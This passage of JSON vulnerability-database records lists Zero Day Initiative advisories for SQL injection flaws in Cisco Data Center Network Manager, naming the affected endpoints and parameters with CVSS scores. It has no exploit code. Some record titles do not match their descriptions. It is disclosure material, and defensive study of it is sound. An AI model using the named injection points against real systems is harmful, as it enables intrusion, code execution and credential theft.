"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-032", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-032/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the VpcWSService/VpcWS service. When parsing the third argument to the getVpcConsistentDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcCount SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-084", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-084/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getOidLanStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-067", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-067/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the vsans endpoint. When parsing the filterStr parameter in the getVsanDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-105", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-105/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getVsanList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-063", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-063/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getNpvLinkStatJoinDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinkStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-090", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-090/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:27", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/imagemanagement/jobs service. When parsing the fabricName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-058", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-058/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:50", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/smartLicensing/getTokenInfo endpoint. When parsing the virtualAcc parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getTokenInfo SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-017", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-017/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the jobs endpoint. When parsing the filterStr parameter in the getJobLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-107", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-107/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/SanGigEStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanGigEStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-043", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-043/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/config/archive/jobs/execution endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobExecutionDetails SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-028", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-028/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:45", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/devicemodule/deviceList endpoint. When parsing the serverId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager DeviceModuleRest getDeviceModulesupport SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-027", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-027/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the group-id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount groupId SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-099", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-099/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getModulesBySwitch service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getModulesBySwitch SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-050", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-050/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/switches service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitches SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-052", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-052/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:00", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the DbInventoryWS service. When parsing the colFilterStr parameter in the getSanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanSwitchDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-104", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-104/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS method. When parsing the item parameter of the getStorageEnclListForHosts endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanListForEnclosures SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, 